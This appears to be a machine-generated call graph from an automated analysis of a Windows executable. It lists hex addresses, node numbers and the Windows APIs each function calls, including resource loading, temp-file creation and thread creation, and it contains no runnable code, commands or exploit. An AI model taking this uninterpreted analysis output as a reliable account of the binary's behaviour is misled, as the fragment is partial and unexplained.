GetLastError TlsGetValue SetLastError 7484->8096 7486 401cc9 8097 40de80 GetLastError TlsGetValue SetLastError 7486->8097 7488 401cd6 8098 40de80 GetLastError TlsGetValue SetLastError 7488->8098 7489->7473 7489->7474 7489->7476 7489->7479 7494 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7489->7494 7491 401cde 8099 405e10 7491->8099 7494->7489 7496 401cee 8108 40d100 7496->8108 7500 401cfb 7501 405eb0 6 API calls 7500->7501 7502 401d03 7501->7502 7503 40dec0 3 API calls 7502->7503 7504 401d0d 7503->7504 8112 40de80 GetLastError TlsGetValue SetLastError 7504->8112 7506 401d17 8113 40e020 7506->8113 7508 401d1f 7509 40dec0 3 API calls 7508->7509 7510 401d29 7509->7510 8118 40de80 GetLastError TlsGetValue SetLastError 7510->8118 7512 401d2f 8119 40de80 GetLastError TlsGetValue SetLastError 7512->8119 7514 401d37 8120 40de80 GetLastError TlsGetValue SetLastError 7514->8120 7516 401d3f 8121 40de80 GetLastError TlsGetValue SetLastError 7516->8121 7518 401d47 7519 40d100 8 API calls 7518->7519 7520 401d57 7519->7520 8122 405182 TlsGetValue 7520->8122 7522 401d5c 7523 405eb0 6 API calls 7522->7523 7524 401d64 7523->7524 7525 40dec0 3 API calls 7524->7525 7526 401d6e 7525->7526 8123 40de80 GetLastError TlsGetValue SetLastError 7526->8123 7528 401d74 8124 40de80 GetLastError TlsGetValue SetLastError 7528->8124 7530 401d7c 8125 405f20 7530->8125 7532 401d8c 7533 40dec0 3 API calls 7532->7533 7534 401d96 7533->7534 7534->7473 8133 40985e 7534->8133 7537 401e12 7540 40df50 HeapFree 7537->7540 7539 401db5 8139 40de80 GetLastError TlsGetValue SetLastError 7539->8139 7542 401e2b 7540->7542 7544 40df50 HeapFree 7542->7544 7543 401dbd 8140 409872 7543->8140 7546 401e34 7544->7546 7548 40df50 HeapFree 7546->7548 7550 401e3d 7548->7550 7552 40df50 HeapFree 7550->7552 7551 401dce 8150 405160 7551->8150 7554 401e46 7552->7554 7555 40df50 HeapFree 7554->7555 7556 40118b 7555->7556 7556->7369 7792 403001 7556->7792 7557 401dd9 7557->7537 8153 40de80 GetLastError TlsGetValue SetLastError 7557->8153 7559 401df2 8154 40de80 GetLastError TlsGetValue SetLastError 7559->8154 7561 401dfa 7562 409872 21 API calls 7561->7562 7563 401e06 7562->7563 7564 40dec0 3 API calls 7563->7564 7564->7537 7566 403df9 7565->7566 7566->7566 7567 40dfc0 21 API calls 7566->7567 7583 403e0b 7567->7583 7568 405dc0 3 API calls 7568->7583 7569 40de80 GetLastError TlsGetValue SetLastError 7590 403e8c 7569->7590 7570 40de80 GetLastError TlsGetValue SetLastError 7596 403f0d 7570->7596 7571 405dc0 3 API calls 7571->7590 7572 40de80 GetLastError TlsGetValue SetLastError 7572->7583 7573 405dc0 3 API calls 7573->7596 7574 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7574->7583 7575 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7575->7596 7576 405dc0 3 API calls 7601 403f8e 7576->7601 7577 40de80 GetLastError TlsGetValue SetLastError 7606 40400f 7577->7606 7578 40de80 GetLastError TlsGetValue SetLastError 7611 404090 7578->7611 7579 40de80 GetLastError TlsGetValue SetLastError 7620 404115 7579->7620 7580 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7580->7590 7581 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7581->7601 7583->7568 7583->7572 7583->7574 7588 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7583->7588 7583->7590 7584 40de80 GetLastError TlsGetValue SetLastError 7584->7601 7585 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7585->7606 7586 405dc0 3 API calls 7586->7611 7587 40de80 GetLastError TlsGetValue SetLastError 7612 40419a 7587->7612 7588->7583 7589 4042a4 8189 40de80 GetLastError TlsGetValue SetLastError 7589->8189 7590->7569 7590->7571 7590->7580 7591 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7590->7591 7590->7596 7591->7590 7592 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7592->7596 7593 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7593->7601 7594 405dc0 3 API calls 7594->7620 7596->7570 7596->7573 7596->7575 7596->7592 7596->7601 7597 4042b0 7600 40e020 4 API calls 7597->7600 7598 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7598->7620 7599 405dc0 3 API calls 7599->7612 7602 4042b8 7600->7602 7601->7576 7601->7581 7601->7584 7601->7593 7601->7606 7605 40e020 4 API calls 7602->7605 7603 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7603->7606 7604 405dc0 3 API calls 7607 40421f 7604->7607 7608 4042c2 7605->7608 7606->7577 7606->7585 7606->7603 7606->7611 8186 405dc0 7606->8186 7607->7589 7607->7604 7618 40de80 GetLastError TlsGetValue SetLastError 7607->7618 7624 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7607->7624 7627 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7607->7627 7610 40dec0 3 API calls 7608->7610 7609 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7609->7611 7613 4042ce 7610->7613 7611->7578 7611->7586 7611->7609 7615 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7611->7615 7611->7620 7612->7587 7612->7599 7612->7607 7617 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7612->7617 7623 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7612->7623 8190 40de80 GetLastError TlsGetValue SetLastError 7613->8190 7615->7611 7616 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7616->7620 7617->7612 7618->7607 7619 4042d4 8191 403275 7619->8191 7620->7579 7620->7594 7620->7598 7620->7612 7620->7616 7623->7612 7624->7607 7625 40dec0 3 API calls 7626 4042ed 7625->7626 7628 40985e 17 API calls 7626->7628 7627->7607 7629 4042f2 GetModuleHandleW 7628->7629 8284 40de80 GetLastError TlsGetValue SetLastError 7629->8284 7631 40430b 8285 40de80 GetLastError TlsGetValue SetLastError 7631->8285 7633 404313 8286 40de80 GetLastError TlsGetValue SetLastError 7633->8286 7635 40431b 8287 40de80 GetLastError TlsGetValue SetLastError 7635->8287 7637 404323 7638 40d100 8 API calls 7637->7638 7639 404335 7638->7639 8288 405182 TlsGetValue 7639->8288 7641 40433a 7642 405eb0 6 API calls 7641->7642 7643 404342 7642->7643 7644 40dec0 3 API calls 7643->7644 7645 40434c 7644->7645 8289 40de80 GetLastError TlsGetValue SetLastError 7645->8289 7647 404352 8290 40de80 GetLastError TlsGetValue SetLastError 7647->8290 7649 40435a 8291 40de80 GetLastError TlsGetValue SetLastError 7649->8291 7651 404362 8292 40de80 GetLastError TlsGetValue SetLastError 7651->8292 7653 40436a 7654 40d100 8 API calls 7653->7654 7655 40437a 7654->7655 8293 405182 TlsGetValue 7655->8293 7657 40437f 7658 405eb0 6 API calls 7657->7658 7659 404387 7658->7659 7660 40dec0 3 API calls 7659->7660 7661 404391 7660->7661 8294 402e9d 7661->8294 7665 4043a4 8311 4021a4 7665->8311 7668 4051a0 3 API calls 7669 4043b4 7668->7669 8427 40195b 7669->8427 7675 4043c8 8518 40358d 7675->8518 7678 40dec0 3 API calls 7679 4043ee PathRemoveBackslashW 7678->7679 7680 404402 7679->7680 8646 40de80 GetLastError TlsGetValue SetLastError 7680->8646 7682 404408 8647 40de80 GetLastError TlsGetValue SetLastError 7682->8647 7684 404410 8648 402bfa 7684->8648 7688 404422 8678 405182 TlsGetValue 7688->8678 7690 40442b 8679 4098c0 7690->8679 7693 4051a0 3 API calls 7694 404439 7693->7694 8683 40de80 GetLastError TlsGetValue SetLastError 7694->8683 7696 404445 7697 40e020 4 API calls 7696->7697 7698 40444d 7697->7698 7699 40e020 4 API calls 7698->7699 7700 404459 7699->7700 7701 40dec0 3 API calls 7700->7701 7702 404465 7701->7702 8684 40de80 GetLastError TlsGetValue SetLastError 7702->8684 7704 40446b 8685 401e55 7704->8685 7707 40dec0 3 API calls 7708 404480 7707->7708 8731 403855 7708->8731 7712 404491 7713 40e020 4 API calls 7712->7713 7714 404499 7713->7714 7715 40dec0 3 API calls 7714->7715 7716 4044a3 PathQuoteSpacesW 7715->7716 8925 40de80 GetLastError TlsGetValue SetLastError 7716->8925 7718 4044b6 7719 40e020 4 API calls 7718->7719 7720 4044be 7719->7720 7721 40e020 4 API calls 7720->7721 7722 4044c9 7721->7722 7723 40e020 4 API calls 7722->7723 7724 4044d3 7723->7724 7725 40dec0 3 API calls 7724->7725 7726 4044dd PathQuoteSpacesW 7725->7726 7727 4044f1 7726->7727 7728 404509 7726->7728 8978 405492 CreateThread 7727->8978 8988 402ca9 7728->8988 7731 404512 8926 40de80 GetLastError TlsGetValue SetLastError 7731->8926 7734 404518 7793 40dfc0 21 API calls 7792->7793 7794 40300e 7793->7794 10167 40de80 GetLastError TlsGetValue SetLastError 7794->10167 7796 403014 10168 40de80 GetLastError TlsGetValue SetLastError 7796->10168 7798 40301c 10169 40de80 GetLastError TlsGetValue SetLastError 7798->10169 7800 403024 10170 40de80 GetLastError TlsGetValue SetLastError 7800->10170 7802 40302c 7803 40d100 8 API calls 7802->7803 7804 40303e 7803->7804 10171 405182 TlsGetValue 7804->10171 7806 403043 7807 405eb0 6 API calls 7806->7807 7808 40304b 7807->7808 7809 40dec0 3 API calls 7808->7809 7810 403055 7809->7810 10172 40de80 GetLastError TlsGetValue SetLastError 7810->10172 7812 40305b 10173 40de80 GetLastError TlsGetValue SetLastError 7812->10173 7814 403063 10174 40de80 GetLastError TlsGetValue SetLastError 7814->10174 7816 40306b 10175 40de80 GetLastError TlsGetValue SetLastError 7816->10175 7818 403073 7819 40d100 8 API calls 7818->7819 7820 403083 7819->7820 10176 405182 TlsGetValue 7820->10176 7822 403088 7823 405eb0 6 API calls 7822->7823 7824 403090 7823->7824 7825 40dec0 3 API calls 7824->7825 7826 40309a 7825->7826 7827 402e9d 35 API calls 7826->7827 7828 4030a2 7827->7828 10177 40de80 GetLastError TlsGetValue SetLastError 7828->10177 7830 4030ac 7831 4021a4 122 API calls 7830->7831 7832 4030b7 7831->7832 7833 4051a0 3 API calls 7832->7833 7834 4030bc 7833->7834 10178 40de80 GetLastError TlsGetValue SetLastError 7834->10178 7836 4030c2 10179 40de80 GetLastError TlsGetValue SetLastError 7836->10179 7838 4030ca 7839 409355 33 API calls 7838->7839 7840 4030dd 7839->7840 7841 40dec0 3 API calls 7840->7841 7842 4030e7 7841->7842 7843 40323e 7842->7843 10180 40de80 GetLastError TlsGetValue SetLastError 7842->10180 7843->7843 7845 4030fe 10181 40de80 GetLastError TlsGetValue SetLastError 7845->10181 7847 403106 10182 40de80 GetLastError TlsGetValue SetLastError 7847->10182 7849 40310e 10183 40de80 GetLastError TlsGetValue SetLastError 7849->10183 7851 403116 7852 40d100 8 API calls 7851->7852 7853 403128 7852->7853 10184 405182 TlsGetValue 7853->10184 7855 40312d 7856 405eb0 6 API calls 7855->7856 7857 403135 7856->7857 7858 40dec0 3 API calls 7857->7858 7859 40313f 7858->7859 10185 40de80 GetLastError TlsGetValue SetLastError 7859->10185 7861 403145 10186 40de80 GetLastError TlsGetValue SetLastError 7861->10186 7863 40314d 10187 40de80 GetLastError TlsGetValue SetLastError 7863->10187 7865 403155 10188 40de80 GetLastError TlsGetValue SetLastError 7865->10188 7867 40315d 7868 40d100 8 API calls 7867->7868 7869 40316f 7868->7869 10189 405182 TlsGetValue 7869->10189 7871 403174 7872 405eb0 6 API calls 7871->7872 7873 40317c 7872->7873 7874 40dec0 3 API calls 7873->7874 7875 403186 7874->7875 10190 40de80 GetLastError TlsGetValue SetLastError 7875->10190 7877 40318c 7878 403cd7 84 API calls 7877->7878 7879 40319c 7878->7879 7880 40dec0 3 API calls 7879->7880 7881 4031a8 7880->7881 10191 40de80 GetLastError TlsGetValue SetLastError 7881->10191 7883 4031ae 7884 403cd7 84 API calls 7883->7884 7885 4031be 7884->7885 7886 40dec0 3 API calls 7885->7886 7887 4031c8 PathAddBackslashW 7886->7887 10192 40de80 GetLastError TlsGetValue SetLastError 7887->10192 7889 4031d7 10193 40de80 GetLastError TlsGetValue SetLastError 7889->10193 7891 4031e7 7892 40e020 4 API calls 7891->7892 7893 4031ef 7892->7893 7894 40e020 4 API calls 7893->7894 7895 4031fb 7894->7895 10194 405182 TlsGetValue 7895->10194 7897 403200 7898 40240c 34 API calls 7897->7898 7899 403208 7898->7899 7900 4051a0 3 API calls 7899->7900 7901 40320d 7900->7901 10195 40de80 GetLastError TlsGetValue SetLastError 7901->10195 7903 403217 7904 40e020 4 API calls 7903->7904 7905 40321f 7904->7905 7906 40dec0 3 API calls 7905->7906 7907 40322b PathRemoveBackslashW 7906->7907 7908 402ca9 141 API calls 7907->7908 7908->7843 7909->7377 7910->7380 7912 40d362 7911->7912 7913 40d3a0 TlsGetValue HeapReAlloc TlsSetValue 7912->7913 7914 40d378 TlsAlloc HeapAlloc TlsSetValue 7912->7914 7915 40d3e0 7913->7915 7916 40d3dc 7913->7916 7914->7913 7921 40db72 HeapAlloc 7915->7921 7916->7915 7917 409674 7916->7917 7920 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7917->7920 7920->7386 7922 40d3ec 7921->7922 7922->7917 7924 40e141 wcslen 7923->7924 7925 40e1ad 7923->7925 7927 40e176 HeapReAlloc 7924->7927 7928 40e158 HeapAlloc 7924->7928 7926 40e1b5 HeapFree 7925->7926 7929 40e198 7925->7929 7926->7929 7927->7929 7928->7929 7929->7391 7931 409def HeapAlloc 7930->7931 7932 409ed8 7930->7932 7931->7395 7931->7396 7956 40a11a 7932->7956 7934 409ee0 7963 40d946 7934->7963 7937 409f23 HeapFree 7937->7931 7938 409f0f 7939 409f10 HeapFree 7938->7939 7939->7939 7940 409f22 7939->7940 7940->7937 7942 40d83a 7941->7942 7943 40d8f2 RtlAllocateHeap 7942->7943 7944 40d846 7942->7944 7946 40d907 7943->7946 7947 409e76 HeapAlloc 7943->7947 8000 40da43 LoadLibraryW 7944->8000 7946->7947 7949 40d930 InitializeCriticalSection 7946->7949 7947->7400 7949->7947 7950 40d887 HeapAlloc 7952 40d8e5 LeaveCriticalSection 7950->7952 7953 40d89d 7950->7953 7951 40d86b 7951->7950 7951->7952 7952->7947 7954 40d819 6 API calls 7953->7954 7955 40d8b4 7954->7955 7955->7952 7960 40a12e 7956->7960 7957 40a177 memset 7959 40a190 7957->7959 7958 40a139 HeapFree 7958->7960 7959->7934 7960->7957 7960->7958 7976 411d8a 7960->7976 7981 40d74b 7960->7981 7964 40d953 EnterCriticalSection 7963->7964 7965 40d9b8 7963->7965 7966 40d9ae LeaveCriticalSection 7964->7966 7967 40d96f 7964->7967 7991 40d6dd 7965->7991 7970 409ee8 HeapFree HeapFree 7966->7970 7969 40d946 4 API calls 7967->7969 7974 40d979 HeapFree 7969->7974 7970->7937 7970->7938 7972 40d9c4 DeleteCriticalSection 7973 40d9ce HeapFree 7972->7973 7973->7970 7974->7966 7977 411e85 7976->7977 7978 411da2 7976->7978 7977->7960 7978->7977 7980 411d8a HeapFree 7978->7980 7988 40df50 7978->7988 7980->7978 7982 40d758 EnterCriticalSection 7981->7982 7985 40d762 7981->7985 7982->7985 7983 40d814 7983->7960 7984 40d80a LeaveCriticalSection 7984->7983 7986 40d7cb 7985->7986 7987 40d7b5 HeapFree 7985->7987 7986->7983 7986->7984 7987->7986 7989 40df5b HeapFree 7988->7989 7990 40df6e 7988->7990 7989->7990 7990->7978 7992 40d6f5 7991->7992 7993 40d6eb EnterCriticalSection 7991->7993 7994 40d712 7992->7994 7995 40d6fc HeapFree 7992->7995 7993->7992 7996 40d718 HeapFree 7994->7996 7997 40d72e 7994->7997 7995->7994 7995->7995 7996->7996 7996->7997 7998 40d745 7997->7998 7999 40d73b LeaveCriticalSection 7997->7999 7998->7972 7998->7973 7999->7998 8001 40da60 GetProcAddress 8000->8001 8002 40da8b InterlockedCompareExchange 8000->8002 8005 40da80 FreeLibrary 8001->8005 8006 40da70 8001->8006 8003 40da9b 8002->8003 8004 40daaf InterlockedExchange 8002->8004 8007 40d855 EnterCriticalSection 8003->8007 8009 40daa0 Sleep 8003->8009 8004->8007 8005->8002 8005->8007 8006->8005 8007->7951 8009->8003 8011 40a4c6 8010->8011 8015 40a4a7 8010->8015 8012 40a3eb 8011->8012 8013 40d74b 3 API calls 8011->8013 8012->7409 8013->8011 8014 411d8a HeapFree 8014->8015 8015->8012 8015->8014 8016 40d74b 3 API calls 8015->8016 8016->8015 8018 40dbdb 8017->8018 8020 40dd26 8017->8020 8018->7423 8018->7425 8019 40dd51 HeapFree 8019->8018 8020->8019 8021 40dd4f 8020->8021 8022 411d8a HeapFree 8020->8022 8021->8019 8022->8020 8024 40dfea TlsGetValue 8023->8024 8025 40dfcc 8023->8025 8027 402f4d 8024->8027 8028 40dffb 8024->8028 8026 40de30 5 API calls 8025->8026 8029 40dfd1 TlsGetValue 8026->8029 8035 4051a0 8027->8035 8067 40e6a0 HeapAlloc HeapAlloc TlsSetValue 8028->8067 8058 412082 8029->8058 8032 40e000 TlsGetValue 8034 412082 13 API calls 8032->8034 8034->8027 8068 40e780 GetLastError TlsGetValue SetLastError 8035->8068 8037 4051ab 8037->7437 8038->7439 8039->7441 8040->7443 8041->7445 8044 40d12d 8042->8044 8069 40d220 8044->8069 8046 405182 TlsGetValue 8046->7449 8048 405ebd 8047->8048 8079 40e1e0 TlsGetValue 8048->8079 8051 40e260 3 API calls 8052 405ed1 8051->8052 8053 405edd 8052->8053 8081 40e370 TlsGetValue 8052->8081 8055 405f0d 8053->8055 8056 405f00 CharUpperW 8053->8056 8055->7451 8056->7451 8057->7453 8059 412092 TlsAlloc InitializeCriticalSection 8058->8059 8060 4120ae TlsGetValue 8058->8060 8059->8060 8061 4120c4 HeapAlloc 8060->8061 8062 41214b HeapAlloc 8060->8062 8063 40dfe8 8061->8063 8064 4120de EnterCriticalSection 8061->8064 8062->8063 8063->8027 8065 4120f0 7 API calls 8064->8065 8066 4120ee 8064->8066 8065->8062 8066->8065 8067->8032 8068->8037 8070 40d22c 8069->8070 8073 40e260 TlsGetValue 8070->8073 8074 40e27b 8073->8074 8075 40e2a1 HeapReAlloc 8074->8075 8076 40e2d4 8074->8076 8077 402fd9 8075->8077 8076->8077 8078 40e2f0 HeapReAlloc 8076->8078 8077->8046 8078->8077 8080 405ec5 8079->8080 8080->8051 8081->8053 8082->7462 8083->7464 8084->7466 8086 40e260 3 API calls 8085->8086 8087 4096aa GetModuleFileNameW wcscmp 8086->8087 8088 4096e5 8087->8088 8089 4096cd memmove 8087->8089 8155 40e3f0 TlsGetValue 8088->8155 8089->8088 8091 401bc5 8092 405182 TlsGetValue 8091->8092 8092->7470 8093->7480 8094->7482 8095->7484 8096->7486 8097->7488 8098->7491 8100 405e1d 8099->8100 8101 40e1e0 TlsGetValue 8100->8101 8102 405e40 8101->8102 8103 40e260 3 API calls 8102->8103 8104 405e4c 8103->8104 8105 401ce9 8104->8105 8156 40e370 TlsGetValue 8104->8156 8107 405182 TlsGetValue 8105->8107 8107->7496 8157 40d080 8108->8157 8111 405182 TlsGetValue 8111->7500 8112->7506 8114 40e042 8113->8114 8115 40e033 wcslen 8113->8115 8116 40e260 3 API calls 8114->8116 8115->8114 8117 40e04d 8116->8117 8117->7508 8118->7512 8119->7514 8120->7516 8121->7518 8122->7522 8123->7528 8124->7530 8126 405f2e 8125->8126 8127 40e1e0 TlsGetValue 8126->8127 8128 405f4a 8127->8128 8129 40e260 3 API calls 8128->8129 8130 405f56 8129->8130 8132 405f62 8130->8132 8173 40e370 TlsGetValue 8130->8173 8132->7532 8174 40d2e8 TlsGetValue 8133->8174 8138 40de80 GetLastError TlsGetValue SetLastError 8138->7539 8139->7543 8141 40d2e8 16 API calls 8140->8141 8142 409885 8141->8142 8143 40973a 17 API calls 8142->8143 8144 409898 8143->8144 8145 40e260 3 API calls 8144->8145 8146 4098a6 8145->8146 8184 40e3f0 TlsGetValue 8146->8184 8148 401dc9 8149 40e080 TlsGetValue 8148->8149 8149->7551 8185 40e740 TlsGetValue 8150->8185 8152 40516a 8152->7557 8153->7559 8154->7561 8155->8091 8156->8105 8160 40d092 8157->8160 8158 40d0dd 8159 40d220 3 API calls 8158->8159 8161 401cf6 8159->8161 8160->8158 8162 40d0b2 8160->8162 8161->8111 8166 4121a0 8162->8166 8164 40d0b8 8172 412190 free 8164->8172 8167 412214 malloc 8166->8167 8168 4121ac WideCharToMultiByte 8166->8168 8167->8164 8168->8167 8170 4121e0 malloc 8168->8170 8170->8167 8171 4121f2 WideCharToMultiByte 8170->8171 8171->8164 8172->8158 8173->8132 8175 409869 8174->8175 8176 40d2fb HeapAlloc TlsSetValue 8174->8176 8180 40973a 8175->8180 8177 40d327 8176->8177 8178 412082 13 API calls 8177->8178 8179 40d348 8178->8179 8179->8175 8181 40d2e8 16 API calls 8180->8181 8182 40974b GetCommandLineW 8181->8182 8183 401dab 8182->8183 8183->7537 8183->8138 8184->8148 8185->8152 8187 40e260 3 API calls 8186->8187 8188 405dcb 8187->8188 8188->7606 8189->7597 8190->7619 8192 40327b 8191->8192 8192->8192 8193 40dfc0 21 API calls 8192->8193 8194 40328d 8193->8194 8195 4051a0 3 API calls 8194->8195 8196 403296 8195->8196 9053 405060 8196->9053 8199 405060 2 API calls 8200 4032af 8199->8200 9056 402bc1 8200->9056 8203 4032b8 9063 40559a GetVersionExW 8203->9063 8204 4032cb 8207 4032d5 8204->8207 8208 40343b 8204->8208 9069 40de80 GetLastError TlsGetValue SetLastError 8207->9069 9101 40de80 GetLastError TlsGetValue SetLastError 8208->9101 8211 403441 9102 40de80 GetLastError TlsGetValue SetLastError 8211->9102 8212 4032db 9070 40de80 GetLastError TlsGetValue SetLastError 8212->9070 8215 403449 8217 4062c0 3 API calls 8215->8217 8216 4032e3 9071 4062c0 8216->9071 8219 403455 8217->8219 8221 40dec0 3 API calls 8219->8221 8223 40345f GetSystemDirectoryW PathAddBackslashW 8221->8223 8222 40dec0 3 API calls 8224 4032f9 GetWindowsDirectoryW PathAddBackslashW 8222->8224 8226 403439 8223->8226 9074 40de80 GetLastError TlsGetValue SetLastError 8224->9074 9061 40de80 GetLastError TlsGetValue SetLastError 8226->9061 8227 40331a 8229 40e020 4 API calls 8227->8229 8231 403322 8229->8231 8230 403480 8232 40e020 4 API calls 8230->8232 8233 40e020 4 API calls 8231->8233 8234 403488 8232->8234 8236 40332d 8233->8236 9062 405170 TlsGetValue 8234->9062 8238 40dec0 3 API calls 8236->8238 8237 40348f 8240 40df50 HeapFree 8237->8240 8239 403337 PathAddBackslashW 8238->8239 9075 40de80 GetLastError TlsGetValue SetLastError 8239->9075 8242 4034a7 8240->8242 8244 40df50 HeapFree 8242->8244 8243 40334a 8245 40e020 4 API calls 8243->8245 8246 4034af 8244->8246 8247 403352 8245->8247 8248 40df50 HeapFree 8246->8248 8249 40e020 4 API calls 8247->8249 8250 4034b8 8248->8250 8251 40335c 8249->8251 8252 40df50 HeapFree 8250->8252 8253 40dec0 3 API calls 8251->8253 8254 4034c1 8252->8254 8255 403366 8253->8255 8257 40df50 HeapFree 8254->8257 9076 40de80 GetLastError TlsGetValue SetLastError 8255->9076 8259 4034ca 8257->8259 8258 403370 8260 40e020 4 API calls 8258->8260 8259->7625 8261 403378 8260->8261 8262 40e020 4 API calls 8261->8262 8263 403382 8262->8263 8264 40e020 4 API calls 8263->8264 8265 40338c 8264->8265 8266 40dec0 3 API calls 8265->8266 8267 403396 8266->8267 9077 40adc0 8267->9077 8269 4033a4 8270 4033ba 8269->8270 9087 40a9d0 8269->9087 8272 40adc0 11 API calls 8270->8272 8273 4033d2 8272->8273 8274 4033e8 8273->8274 8275 40a9d0 11 API calls 8273->8275 8274->8226 9099 40de80 GetLastError TlsGetValue SetLastError 8274->9099 8275->8274 8277 403404 9100 40de80 GetLastError TlsGetValue SetLastError 8277->9100 8279 40340c 8280 4062c0 3 API calls 8279->8280 8281 403418 8280->8281 8282 40dec0 3 API calls 8281->8282 8283 403422 GetSystemDirectoryW PathAddBackslashW 8282->8283 8283->8226 8284->7631 8285->7633 8286->7635 8287->7637 8288->7641 8289->7647 8290->7649 8291->7651 8292->7653 8293->7657 8295 40dfc0 21 API calls 8294->8295 8296 402eaa 8295->8296 8297 405060 2 API calls 8296->8297 8298 402eb6 FindResourceW 8297->8298 8299 402ed5 8298->8299 8306 402ef1 8298->8306 9157 4026b8 8299->9157 8303 402f00 9154 40e7c0 8303->9154 9151 409ba0 8306->9151 8308 40df50 HeapFree 8309 402f3b 8308->8309 8310 40de80 GetLastError TlsGetValue SetLastError 8309->8310 8310->7665 8312 40dfc0 21 API calls 8311->8312 8313 4021b0 8312->8313 8314 4051a0 3 API calls 8313->8314 8315 4021b9 8314->8315 8316 4021d2 8315->8316 8317 4023ba 8315->8317 9193 40de80 GetLastError TlsGetValue SetLastError 8316->9193 9191 40de80 GetLastError TlsGetValue SetLastError 8317->9191 8320 4021d8 9194 40de80 GetLastError TlsGetValue SetLastError 8320->9194 8321 4023c4 8323 40e020 4 API calls 8321->8323 8325 4023cc 8323->8325 8324 4021e0 9195 40de80 GetLastError TlsGetValue SetLastError 8324->9195 9192 405170 TlsGetValue 8325->9192 8328 4021e8 9196 40de80 GetLastError TlsGetValue SetLastError 8328->9196 8329 4023d3 8331 40df50 HeapFree 8329->8331 8333 4023eb 8331->8333 8332 4021f0 9197 409c10 8332->9197 8335 40df50 HeapFree 8333->8335 8337 4023f4 8335->8337 8336 402204 9206 405182 TlsGetValue 8336->9206 8339 40df50 HeapFree 8337->8339 8342 4023fc 8339->8342 8340 402209 9207 406060 8340->9207 8344 40df50 HeapFree 8342->8344 8346 402405 8344->8346 8345 40dec0 3 API calls 8347 40221b 8345->8347 8346->7668 9210 40de80 GetLastError TlsGetValue SetLastError 8347->9210 8349 402221 9211 40de80 GetLastError TlsGetValue SetLastError 8349->9211 8351 402229 9212 40de80 GetLastError TlsGetValue SetLastError 8351->9212 8353 402231 9213 40de80 GetLastError TlsGetValue SetLastError 8353->9213 8355 402239 8356 409c10 5 API calls 8355->8356 8357 402250 8356->8357 9214 405182 TlsGetValue 8357->9214 8359 402255 8360 406060 5 API calls 8359->8360 8361 40225d 8360->8361 8362 40dec0 3 API calls 8361->8362 8363 402267 8362->8363 9215 40de80 GetLastError TlsGetValue SetLastError 8363->9215 8365 40226d 9216 40de80 GetLastError TlsGetValue SetLastError 8365->9216 8367 402275 9217 40de80 GetLastError TlsGetValue SetLastError 8367->9217 8369 402288 9218 40de80 GetLastError TlsGetValue SetLastError 8369->9218 8371 402290 9219 4057f0 8371->9219 8373 4022a6 9235 40e080 TlsGetValue 8373->9235 8375 4022ab 9236 40de80 GetLastError TlsGetValue SetLastError 8375->9236 8377 4022b1 9237 40de80 GetLastError TlsGetValue SetLastError 8377->9237 8379 4022b9 8380 4057f0 9 API calls 8379->8380 8381 4022cf 8380->8381 9238 405182 TlsGetValue 8381->9238 8383 4022d4 9239 405182 TlsGetValue 8383->9239 8385 4022dc 9240 408f69 8385->9240 8388 40dec0 3 API calls 8389 4022ef 8388->8389 8390 4023b0 8389->8390 8391 402300 8389->8391 8393 401fa9 36 API calls 8390->8393 9282 40de80 GetLastError TlsGetValue SetLastError 8391->9282 8393->8317 8394 402306 9283 40de80 GetLastError TlsGetValue SetLastError 8394->9283 8396 40230e 9284 40de80 GetLastError TlsGetValue SetLastError 8396->9284 8398 40231b 9285 40de80 GetLastError TlsGetValue SetLastError 8398->9285 8400 402323 8401 406060 5 API calls 8400->8401 8402 40232e 8401->8402 9286 405182 TlsGetValue 8402->9286 8404 402333 8405 40d100 8 API calls 8404->8405 8406 40233b 8405->8406 8407 40dec0 3 API calls 8406->8407 8408 402345 8407->8408 8409 4023ae 8408->8409 9287 40de80 GetLastError TlsGetValue SetLastError 8408->9287 8409->8317 8411 40235b 9288 40de80 GetLastError TlsGetValue SetLastError 8411->9288 8413 402368 9289 40de80 GetLastError TlsGetValue SetLastError 8413->9289 8415 402370 8416 4057f0 9 API calls 8415->8416 8417 402386 8416->8417 9290 40e080 TlsGetValue 8417->9290 8419 40238b 9291 405182 TlsGetValue 8419->9291 8421 402396 9292 408e27 8421->9292 8424 4051a0 3 API calls 8425 4023a4 8424->8425 8426 401fa9 36 API calls 8425->8426 8426->8409 8428 40dfc0 21 API calls 8427->8428 8432 401969 8428->8432 8429 4019ea 8431 409ba0 RtlAllocateHeap 8429->8431 8430 40de80 GetLastError TlsGetValue SetLastError 8430->8432 8433 4019f4 8431->8433 8432->8429 8432->8430 8436 405dc0 3 API calls 8432->8436 8443 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8432->8443 8448 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8432->8448 9349 40de80 GetLastError TlsGetValue SetLastError 8433->9349 8435 4019fe 9350 40de80 GetLastError TlsGetValue SetLastError 8435->9350 8436->8432 8438 401a06 9351 40a756 8438->9351 8441 40dec0 3 API calls 8442 401a17 GetTempFileNameW 8441->8442 9360 40de80 GetLastError TlsGetValue SetLastError 8442->9360 8443->8432 8445 401a35 9361 40de80 GetLastError TlsGetValue SetLastError 8445->9361 8447 401a3d 8449 409bc0 4 API calls 8447->8449 8448->8432 8450 401a48 8449->8450 8451 40dec0 3 API calls 8450->8451 8452 401a54 8451->8452 9362 40a7e7 8452->9362 8458 401a8a 9371 40de80 GetLastError TlsGetValue SetLastError 8458->9371 8460 401a92 8461 409bc0 4 API calls 